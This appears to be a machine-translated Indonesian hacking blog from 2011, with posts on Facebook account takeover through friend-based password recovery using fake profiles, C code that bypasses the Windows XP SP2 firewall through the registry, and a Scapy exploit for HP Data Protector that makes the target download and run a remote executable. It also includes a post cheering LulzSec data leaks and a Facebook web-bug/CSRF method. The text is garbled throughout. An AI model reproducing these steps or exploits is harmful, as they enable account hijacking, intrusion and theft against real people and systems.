Senin, 06 Juni 2011

Cara Hack Sandi agar dengan menambahkan ke daftar teman

                                                       Hacking Password agar                             Cara Hack Sandi agar dengan menambahkan ke daftar teman
Beberapa hari ini agar pengguna memiliki ratusan dan mungkin ribuan teman. teman-teman Lebih meningkatkan peluang Anda agar account akan di-hack - terutama jika Anda menerima permintaan teman dari orang-orang yang tidak tahu.

kerentanan Kritis ditemukan di FACEBOOK

It tidak sepenuhnya biasa bahwa agar pengguna menerima permintaan teman dari orang yang mereka tidaktahu. Seringkali, mereka permintaan teman secara membuta diterima dalam upaya untuk menumbuhkan dasarpersahabatan. Tampaknya khususnya orang-orang dengan account agar yang terutama digunakan untuk tujuan pemasaran lebih cenderung menerima permintaan teman dari orang-orang mereka tidak tahu daripengguna agar tidak khas.

Rekening tersebut bisa hack dengan mudah, dan tidak ada bakat hacking cerdik dibutuhkan untuk melakukannya: Anda hanya perlu berjalan melalui proses pemulihan passwork agar dengan dua teman agarlainnya dari account yang ditargetkan.

Anda dapat dengan mudah memperoleh akses ke account agar teman-teman Anda melalui pendekatan kolusi. Anda harus menggunakan password recovery dapat's fitur, yang dapat diakses melalui "Lupa passwordAnda?" link di halaman login dapat.

Setelah mengidentifikasi Teman, agar disarankan untuk memulihkan password melalui alamat email yang ada. Namun, Anda dapat melewati rintangan ini dengan mengklik "Tidak lagi memiliki akses untuk ini?" link. Dalam hal ini, agar meminta alamat email baru. Pada langkah berikut, agar menyajikan pertanyaan keamanan yangterkait dengan account. Namun, Anda juga bisa untuk memotong pertanyaan dengan mengetik jawaban yang salah sebanyak tiga kali berturut-turut. Setelah itu, agar menyediakan cara yang agak mengejutkan untukmendapatkan akun Anda kembali - melalui dukungan dari tiga orang teman.
1. Pertama, Anda memilih tiga orang teman "Anda percaya". Ketiga teman-teman kemudian menerima kode, yang diperlukan untuk mengubah password account.

2. Pilih diri sendiri dan segera menerima kode dari Facebook. Dengan tiga kode, Anda dapat dengan mudahmengubah password untuk account yang ditargetkan.

3. Masalahnya jelas adalah bahwa tiga teman-teman Anda tidak benar-benar tahu dan tidak bisa percaya     bisa  berpotensi mendapatkan akses ke account korban agar - melalui fitur pemulihan password standar.
4. Untuk bypass masalah yang disebutkan dalam langkah 3 SOCIAL ENGINEERING
    Buat profil Anda sendiri 2 palsu lebih dan menambahkan korban sebagai teman di facebook. Sekarangsemua 3 kode dan Anda selesai.

CATATAN: akun ditargetkan akan terkunci selama 24 jam setelah ini mengganti password dan alamat email lama pengguna menerima pemberitahuan dari perubahan password serta nama-nama dari tiga teman-temanyang diberi kode. Namun, jika ini berteman dengan nama-nama palsu, itu tidak cukup peduli bahwa Andasekarang tahu nama mereka.

Sekarang jika pengguna agar bisa pada kenyataannya berada dalam situasi ketika account agar tidakdiperiksa dalam waktu 24-jam, terutama karena kami menikmati untuk memamerkan kegiatan kami melaluipesan status dapat. Dan jika account dicek, account tergantung pada waktu respon Facebook, yang dengan mudah dapat meregang untuk beberapa hari.
Intinya adalah Anda tidak mengekspos diri Anda untuk orang yang Anda tidak tahu.

Cara Bypass Firewall Windows XP

Halo teman, saya hari ini akan berbagi dengan Anda menggunakan teknik yang kita bisa bypass windows-xp service pack-2 firewall. Sebuah kerjanya 100% hack dan yang pada dasarnya mengeksploitasi di windows XP.
Teknik ini tidak lain adalah kerentanan yang ditemukan di windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :-
Microsoft Windows XP SP2 dibundel dengan Firewall. Akses langsung ke kunci registri Firewall memungkinkan penyerang lokal untuk memotong daftar Firewall blocking dan memungkinkan program jahat dapat terhubung jaringan.

Vulnerable Systems :-

* Microsoft Windows XP SP2
Firewall Windows XP SP2 memiliki daftar program yang diperbolehkan dalam registri yang tidak benar dilindungi dari modifikasi oleh attacker.If lokal berbahaya penyerang menambahkan sebuah kunci baru ke alamat registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
penyerang dapat mengaktifkan malware-nya atau Trojan dapat terhubung ke Internet tanpa Firewall memicu peringatan.
Proof of Concept :-
Peluncuran program regedit.exe dan mengakses kunci ditemukan di bawah jalan sebagai berikut:
 
 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>

#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");

RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");

sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, "quit"))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */
Hapus ** dari file header ... lebih mudah untuk memahami ... Di sini kita hanya memanipulasi nilai registry menggunakan program ini ...

HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)

# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: fdisk
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# The following PoC instructs an HP Data Protector Client to download and install an .exe file. It tries to get the file
# from a share (\\pwn2003se.home.it) and if it fails it tries to access the same file via HTTP. To get the PoC working with
# this payload share a malicious file via HTTP under http://pwn2003se.home.it/Omniback/i386/installservice.exe.exe and you are done.
# Tweak payload to better suit your needs.
#
# Since you're crafting packets with Scapy don't forget to use iptables to block the outbound resets or your host will
# reset your connection after receiving and unsolicited SYN/ACK that is not associated with any open session/socket. Have Fun.
#
# Special thanks to all the Exploit-DB Dev Team.

from scapy.all import *

if len(sys.argv) != 2:
    print "Usage: ./ZDI-11-056.py <Target IP>"
    sys.exit(1)

target = sys.argv[1]

payload = ("\x00\x00\x01\xbe"
"\xff\xfe\x32\x00\x00\x00\x20\x00\x70\x00\x77\x00\x6e\x00\x32\x00"
"\x30\x00\x30\x00\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00"
"\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x00\x00\x20\x00\x30\x00"
"\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
"\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
"\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
"\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
"\x5c\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00"
"\x53\x00\x45\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00"
"\x69\x00\x74\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
"\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
"\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
"\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
"\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
"\x72\x00\x63\x00\x65\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
"\x20\x00\x00\x00\x20\x00\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00"
"\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00"
"\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
"\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
"\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
"\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
"\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
"\x5c\x00\x5c\x00\x70\x00\x77\x00\x4e\x00\x32\x00\x30\x00\x30\x00"
"\x33\x00\x53\x00\x45\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00"
"\x62\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00"
"\x02\x54"
"\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
"\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
"\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c\x00\x70\x00\x77\x00"
"\x6e\x00\x32\x00\x30\x00\x30\x00\x33\x00\x53\x00\x45\x00\x2e\x00"
"\x68\x00\x6f\x00\x6d\x00\x65\x00\x2e\x00\x69\x00\x74\x00\x5c\x00"
"\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00"
"\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00\x0a\x00\x49\x00\x4e\x00"
"\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00\x41\x00\x54\x00\x49\x00"
"\x4f\x00\x4e\x00\x54\x00\x59\x00\x50\x00\x45\x00\x3d\x00\x22\x00"
"\x43\x00\x6c\x00\x69\x00\x65\x00\x6e\x00\x74\x00\x22\x00\x20\x00"
"\x43\x00\x45\x00\x4c\x00\x4c\x00\x4e\x00\x41\x00\x4d\x00\x45\x00"
"\x3d\x00\x22\x00\x70\x00\x77\x00\x6e\x00\x32\x00\x30\x00\x30\x00"
"\x33\x00\x73\x00\x65\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00\x65\x00"
"\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x43\x00\x45\x00\x4c\x00"
"\x4c\x00\x43\x00\x4c\x00\x49\x00\x45\x00\x4e\x00\x54\x00\x4e\x00"
"\x41\x00\x4d\x00\x45\x00\x3d\x00\x22\x00\x73\x00\x65\x00\x63\x00"
"\x75\x00\x72\x00\x6e\x00\x65\x00\x74\x00\x2d\x00\x62\x00\x32\x00"
"\x75\x00\x64\x00\x66\x00\x76\x00\x2e\x00\x68\x00\x6f\x00\x6d\x00"
"\x65\x00\x2e\x00\x69\x00\x74\x00\x22\x00\x20\x00\x41\x00\x4c\x00"
"\x4c\x00\x55\x00\x53\x00\x45\x00\x52\x00\x53\x00\x3d\x00\x35\x00"
"\x20\x00\x49\x00\x4e\x00\x53\x00\x54\x00\x41\x00\x4c\x00\x4c\x00"
"\x44\x00\x49\x00\x52\x00\x3d\x00\x22\x00\x24\x00\x28\x00\x4f\x00"
"\x4d\x00\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00"
"\x5c\x00\x22\x00\x20\x00\x50\x00\x52\x00\x4f\x00\x47\x00\x52\x00"
"\x41\x00\x4d\x00\x44\x00\x41\x00\x54\x00\x41\x00\x3d\x00\x22\x00"
"\x24\x00\x28\x00\x44\x00\x41\x00\x54\x00\x41\x00\x4f\x00\x4d\x00"
"\x4e\x00\x49\x00\x42\x00\x41\x00\x43\x00\x4b\x00\x29\x00\x5c\x00"
"\x22\x00\x20\x00\x49\x00\x4e\x00\x45\x00\x54\x00\x50\x00\x4f\x00"
"\x52\x00\x54\x00\x3d\x00\x35\x00\x35\x00\x35\x00\x35\x00\x20\x00"
"\x41\x00\x44\x00\x44\x00\x4c\x00\x4f\x00\x43\x00\x41\x00\x4c\x00"
"\x3d\x00\x63\x00\x6f\x00\x72\x00\x65\x00\x2c\x00\x6a\x00\x61\x00"
"\x76\x00\x61\x00\x67\x00\x75\x00\x69\x00\x20\x00\x4f\x00\x50\x00"
"\x54\x00\x5f\x00\x44\x00\x4e\x00\x53\x00\x43\x00\x48\x00\x45\x00"
"\x43\x00\x4b\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00\x54\x00"
"\x5f\x00\x53\x00\x4b\x00\x49\x00\x50\x00\x49\x00\x4d\x00\x50\x00"
"\x4f\x00\x52\x00\x54\x00\x3d\x00\x31\x00\x20\x00\x4f\x00\x50\x00"
"\x54\x00\x5f\x00\x4d\x00\x53\x00\x47\x00\x3d\x00\x31\x00\x0a\x00"
"\x00\x00\x00\x00")

ip=IP(dst=target)
SYN=TCP(sport=31337, dport=5555, flags="S")
packet=ip/SYN
SYNACK=sr1(packet)

my_ack = SYNACK.seq + 1
print SYNACK.seq
print my_ack
ACK=TCP(sport=31337, dport=5555, flags="A", seq=1, ack=my_ack)
send(ip/ACK)

PUSH=TCP(sport=31337, dport=5555, flags="PA", seq=1, ack=my_ack)
send(ip/PUSH/payload)

Lulzsec hack Infragard Atlanta Members Alliance & challenge FBI !

Lulzsec hack Infragard Atlanta Members Alliance & challenge FBI !



Lulzsec yesterday hack Sony and Today they hack Infragard Atlanta Members Alliance , which having partnership with FBI .


There is a Video Posted By Lulzsec on Their site after hack :



The message written by them :
LET IT FLOW YOU STUPID FBI BATTLESHIPS


Not even This , 700 mb of Emails backup also hacked and leaked via Torrent. The Tut about how to open these mails also posted by Lulzsec :


Twitter feed to taunt the Federal Bureau of Investigation in the wake of a major cyberattack on Sony Pictures Entertainment and Sony Music.


LulzSec also said that it has received some funding from supporters who want to see it continue its work.


Lulzsec other previous hacks are:
Sony Pictures hacked and Database Leaked
Public Broadcasting Service (PBS) Hacked
LulzSec Leak Sony's Japanese websites Database
LulzSec Hack & Leak pointless ATM information
X Factor Leaked Contestants Databas

Minggu, 05 Juni 2011

Bypass dapat dari server cache, Periksa yang mengunjungi profil Anda!






RingkasanMari saya jelaskan lubang keamanan di Facebook dalam kaitannya dengan server cache mereka, yang membentuk suatu lapisan antara internet dan internal konten multimedia (foto dan video upload). Putusan ini, memungkinkan akses ke browser meminta baku dari teman-teman kita, sehingga informasi pribadi orang-orang ini (web-bug), atau digunakan sebagai jembatan untuk mengambil keuntungan dari kerentanan eksternal lainnya (CSRF).Facebook dan lapisan menengahSering kali Anda telah melihat hal ini "menggunakan aplikasi ini dan mencari tahu orang yang mengunjungi profil Anda, kanan, Nah, ini akan selalu palsu,? karena dapat dirancang dengan cara yang membuat tidak mungkin. Jika Anda melihat, ketika Anda naik foto seperti profil, itu diubah ukurannya, dikompres, dan disimpan di server sendiri agar itu Sebenarnya, ada ratusan server, yang membentuk apa yang disebut CDN Contoh foto profil..:

    
http://profile.ak. fb .net/hprofile-ak-snc4/41513_1381714233_4208850_q.jpg CDN
Jika Anda pergi ke account Facebook Anda, Anda melihat kode sumber (Ctrl + U di Firefox), dan mencari urutan `fbcdn 'akan penuh. Dan kasih karunia ini. Bagaimana jika Anda menggunakan program seperti 'Tamper Data', Anda akan melihat bahwa semua permintaan there.Nothing pergi keluar.Pertanyaannya adalah: Mengapa? Karena itu, Facebook akan menghemat banyak masalah keamanan (termasuk privasi), mendapatkan kontrol penuh atas yang pergi dan di mana ia pergi (data mining). Ini bukan biaya nol ke Facebook, tapi itu benar-benar sangat mahal secara finansial.Perhatikan bahwa ini bukanlah satu-satunya yang harus dilakukan. Tuenti, misalnya, juga memiliki CRC nya sendiri.ProsesTujuannya adalah untuk mendapatkan link langsung ke luar tanpa melalui saringan internal.Pertama, membuat catatan baru. Isi harus setidaknya kode berikut:

  
<img src="http://[dirección]" />
Setelah catatan dibuat, Anda dapat memilih siapa adalah target ini. Hal ini sangat penting karena akan sangat penting untuk memimpin serangan ke orang tertentu atau kelompok:Setelah dibuat, jika kita melihat kode sumber, kita dapat melihat bahwa telah dibuat di bawah arahan dari CRC:

:
Sekarang kita bisa pergi ke dinding kita, yang telah menciptakan auto-posting baru, dan menghapusnya. Tidak ada gunanya. Apa yang perlu anda lakukan adalah berbagi catatan secara manual. Kita juga harus memilih dengan siapa kita berbagi, seperti yang kita lakukan saat membuat itu. Perbaiki dalam kode yang direplikasi.
Ini dikirim kode ini mentah, tidak replika dibuat jika gambar atau video upload dengan cara yang khas, yang sekarang tertanam. Facebook adalah waspada terhadap gambar yang masuk melalui catatan bagian, adalah "up", tidak eksternal, jadi jangan meletakkan jaminan tambahan.
Hasilnya adalah seperti yang diharapkan:
Kegunaan Saya lihat 2 vektor serangan, namun imajinasi kekuasaan.
1) Ambil data melalui bug-web. Apakah untuk menempatkan server Anda sendiri file dinamis yang berisi informasi (waktu, ip, user_agent, referer, ...), tetapi menyamar sebagai gambar. Berikut datang kekuasaan set (bisa) agar sehingga hanya meninggalkan gambar di dinding Anda, yang memungkinkan untuk menghitung berapa banyak pengunjung Anda memiliki (woo!).
Saya telah melakukan bukti dari konsep di tingkat teman-teman, dan ada banyak contoh surfing melalui Facebook Mobile, yang penasaran:
Sekarang kita bisa pergi ke dinding kita, yang telah menciptakan auto-posting baru, dan menghapusnya. Tidak ada gunanya. Apa yang perlu anda lakukan adalah berbagi catatan secara manual. Kita juga harus memilih dengan siapa kita berbagi, seperti yang kita lakukan saat membuat itu. Perbaiki dalam kode yang direplikasi.

Ini dikirim kode ini mentah, tidak replika dibuat jika gambar atau video upload dengan cara yang khas, yang sekarang tertanam.
Facebook adalah waspada terhadap gambar yang masuk melalui catatan bagian, adalah "up", tidak eksternal, jadi jangan meletakkan jaminan tambahan.
Hasilnya adalah seperti yang diharapkan:

Kegunaan
Saya lihat 2 vektor serangan, namun imajinasi kekuasaan. 1) Ambil data melalui bug-web. Apakah untuk menempatkan server Anda sendiri file dinamis yang berisi informasi (waktu, ip, user_agent, referer, ...), tetapi menyamar sebagai gambar. Berikut datang kekuasaan set (bisa) agar sehingga hanya meninggalkan gambar di dinding Anda, yang memungkinkan untuk menghitung berapa banyak pengunjung Anda memiliki (woo!). Saya telah melakukan bukti dari konsep di tingkat teman-teman, dan ada banyak contoh surfing melalui Facebook Mobile, yang penasaran:
2) menggunakan kerentanan untuk menyerang situs eksternal lain yang rentan terhadap CSRF. Sebuah contoh akan dapat beroperasi di bank hanya dengan melakukan panggilan langsung ke satu alamat, misalnya, http://url.ext/mover_dinero.php?de=XXX&a=XXX&cantidad=999999. Ideal untuk menyerang sistem survei, mengkonfigurasi tingkat visibilitas ke `foo ', dan mendorong orang untuk berbagi. Ketahuilah bahwa adalah mungkin untuk membuat panggilan ke gedung ini agar di dalam Referer. ERGIO Arcos tidak punya niat untuk tidak mencoba. Catatan Akhir Pertama, meyakinkan semua orang: "Tidak apa-apa yang serius", seperti yang dilaporkan, dan semua data ERGIO Arcos dikumpulkan dalam pembuktian konsep sama sekali tidak berbahaya. Agar pada saat ini sudah dilindungi. Saya kira apa yang paling memukul saya ditemukan di situs begitu populer dan begitu diaudit, kesalahan "begitu sederhana". ERGIO Arcos kira Anda sudah beruntung, tetapi ERGIO Arcos dibuat ilusi Laporan Pada tanggal 17 Maret sore, ERGIO Arcos merasakan kerentanan. Pada hari 18, memeriksa dan menemukan cara untuk memanfaatkannya. ERGIO bukti Arcos konsep selama 3-4 jam, dan laporan kerentanan terhadap Facebook di sore hari. 19 hari tetapi belum di Facebook untuk menjawab surat saya, ERGIO Arcos melihat ini diselesaikan. Kemudian diterbitkan pos, meskipun keraguan Arcos ERGIO bahwa "laporan tersebut telah diatasi untuk saya." ERGIO ARCOSdo tidak peduli juga